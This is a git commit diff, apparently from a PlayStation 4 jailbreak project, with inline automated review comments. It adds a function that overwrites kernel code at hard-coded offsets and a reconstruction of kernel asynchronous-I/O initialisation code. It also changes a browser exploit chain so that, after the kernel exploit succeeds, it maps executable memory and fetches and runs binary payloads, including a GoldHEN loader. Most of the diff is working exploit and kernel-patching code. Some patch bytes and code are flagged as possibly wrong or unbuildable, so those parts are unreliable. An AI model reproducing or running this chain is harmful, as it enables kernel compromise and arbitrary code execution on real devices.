Temp AIO Payload Fix by ABC

Kameleon
2025-08-20 22:35:00 -06:00
parent e01068bca9
commit 6833f09ae1
7 changed files with 165 additions and 9 deletions
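--- /dev/null
+++ b/FILE-PATH-NOT-ON-PAGE-1
@@ -0,0 +1,61 @@
+void patch_aio(void * kbase) {
+{
+size_t off = 0x9f141;
+u8 patch[] = {0xeb, 0x48};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f183;
+memset(kbase + off, 0x90, 8);
+}
+{
+size_t off = 0x9f18b;
+u8 patch[] = {41, 83, 0xbf, 0xa0, 0x04, 0x00, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f199;
+u8 patch[] = {0x49, 0x8b, 0x87, 0xd0, 0x04, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f1a6;
+u8 patch[] = {0x49, 0x8b, 0xb7, 0xb0, 0x04, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f1be;
+u8 patch[] = {0x49, 0x8b, 0x87, 0x40, 0x05, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f1cb;
+u8 patch[] = {0x49, 0x8b, 0xb7, 0x20, 0x05, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f1e3;
+u8 patch[] = {0x49, 0x8d, 0xbf, 0xc0, 0x00, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f1ef;
+u8 patch[] = {0x49, 0x8d, 0xbf, 0xe0, 0x00, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f202;
+u8 patch[] = {0x49, 0x8d, 0xbf, 0x00, 0x01, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f20e;
+u8 patch[] = {0x49, 0x8d, 0xbf, 0x20, 0x01, 0x00, 0x00};
+memcpy(kbase + off, patch, sizeof patch);
+}
+{
+size_t off = 0x9f21f;
+u8 patch[] = {0x49, 0x8b, 0xff};
+memcpy(kbase + off, patch, sizeof patch);
+}
+}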
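Review bot: The twelve offsets in `patch_aio` are raw magic numbers with nothing recording which kernel build they were taken from, and the function writes through them unconditionally, so a caller on any other build silently overwrites unrelated code; a header comment such as `/* Offsets valid only for kernel build <BUILD-ID-NOT-ON-PAGE>; the caller must confirm the target build before calling. */` should state that precondition. The arithmetic `kbase + off` on a `void *` relies on a GNU extension rather than standard C, so a single `u8 *base = (u8 *)kbase;` at the top, used in place of `kbase` in every block, would make the byte-addressing explicit and portable. The third block's array mixes decimal `41, 83` with hex in every other entry; whether or not those two values are intended, writing every byte in the same radix is what lets a wrong byte be spotted at a glance.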
+81
@@ -0,0 +1,81 @@
int sys_aio_init(struct thread *td, aio_init_args *uap)
{
return __aio_init(td, uap->param, uap->size, uap->reserved4, uap->reserved5);
}
int __aio_init(
struct thread *td,
SceKernelAioParam* param,
u_int size,
u_long reserved4,
u_int reserved5)
{
// ...
if (param == NULL
|| ctx != &aio_ctxs[0]
|| aio_ctxs[0].state != 0
) {
init:
sx_xunlock(&aio_sx);
error = aio_init_params(init_sched_params, ctx);
if (error != 0) {
print_err(error);
}
goto done;
}
// ...
done:
return error;
unlock:
sx_xunlock(&aio_sx);
goto done;
}
int aio_init_ctx(int init_sched_params, struct aio_context *ctx)
{
// ...
if (aio_ehs[0] == 0) {
aio_ehs[0] = EVENTHANDLER_REGISTER(
"process_suspend_phase4",
process_suspend4_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[1] = EVENTHANDLER_REGISTER(
"process_suspend_phase1_end",
process_suspend1_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[2] = EVENTHANDLER_REGISTER(
"process_resume_phase2",
process_resume_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[3] = EVENTHANDLER_REGISTER(
"process_dtor",
process_dtor_handler, // !!!
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[4] = EVENTHANDLER_REGISTER(
"process_exit",
process_exit_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[5] = EVENTHANDLER_REGISTER(
"process_exit_fd_closed",
process_exit_fd_closed_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
// ...
}
// ...
}
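Review bot: `__aio_init` calls `aio_init_params(init_sched_params, ctx)` under the `init:` label, while the function defined below with that exact parameter list is named `aio_init_ctx`; one of the two names is a typo and a reader cannot tell which. The bare `// !!!` on the `process_dtor` registration flags something without saying what; replace it with one sentence naming what the reader should notice about that handler. Because the `init:` label sits inside the `if` body and `error`, `ctx` and `aio_sx` are never declared, the file reads as a reference reconstruction rather than buildable source, which a header comment such as `// Reference reconstruction, not compiled; elisions are marked with // ...` should state.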
BIN
Binary file not shown.
BIN
Binary file not shown.
+21 -8
@@ -139,6 +139,11 @@ const leak_len = 16;
const num_leaks = 5; const num_leaks = 5;
const num_clobbers = 8; const num_clobbers = 8;
//Payload_Loader
const PROT_READ = 1;
const PROT_WRITE = 2;
const PROT_EXEC = 4;
let chain = null; let chain = null;
var nogc = []; var nogc = [];
@@ -1810,13 +1815,9 @@ function array_from_address(addr, size) {
return og_array; return og_array;
} }
kexploit().then(() => { function PayloadLoader(Pfile)
{
const PROT_READ = 1; var loader_addr = chain.sysp(
const PROT_WRITE = 2;
const PROT_EXEC = 4;
var loader_addr = chain.sysp(
'mmap', 'mmap',
new Int(0, 0), new Int(0, 0),
0x1000, 0x1000,
@@ -1831,7 +1832,7 @@ var loader_addr = chain.sysp(
var req = new XMLHttpRequest(); var req = new XMLHttpRequest();
req.responseType = "arraybuffer"; req.responseType = "arraybuffer";
req.open('GET','payload.bin'); req.open('GET',Pfile);
req.send(); req.send();
req.onreadystatechange = function () { req.onreadystatechange = function () {
if (req.readyState == 4) { if (req.readyState == 4) {
@@ -1856,4 +1857,16 @@ var loader_addr = chain.sysp(
} }
}; };
}
kexploit().then(() => {
//Load ABC fix as a regular Payload
setTimeout(PayloadLoader("aio_patches.bin"),500);
log("AIO Fixes Applied.!");
//Load GoldHEN :)
setTimeout(PayloadLoader("goldhen.bin"),500);
log("GoldHEN Loaded.!");
}) })
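Review bot: `setTimeout(PayloadLoader("aio_patches.bin"),500)` calls `PayloadLoader` immediately and hands its return value (`undefined`) to `setTimeout`, so the 500 ms delay is never applied, and the `setTimeout(PayloadLoader("goldhen.bin"),500)` line two lines below has the same problem; if a delay is intended the call has to be wrapped, `setTimeout(() => PayloadLoader("aio_patches.bin"), 500);`. The `log("AIO Fixes Applied.!")` and `log("GoldHEN Loaded.!")` lines run right after the request is issued, before the `req.onreadystatechange` handler has fired, so they report a result that has not happened yet; either move each message into the `readyState == 4` path of `PayloadLoader` or word it as "requested". `PayloadLoader` itself is defined in the earlier hunks of this section and its body continues outside this one.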
BIN
Binary file not shown.
+2 -1
@@ -7,7 +7,8 @@ cache.html
config.mjs config.mjs
index.html index.html
lapse.mjs lapse.mjs
payload.bin aio_patches.bin
goldhen.bin
psfree.mjs psfree.mjs
fonts\LiberationMono-Regular.ttf fonts\LiberationMono-Regular.ttf
kpatch\900.elf kpatch\900.elf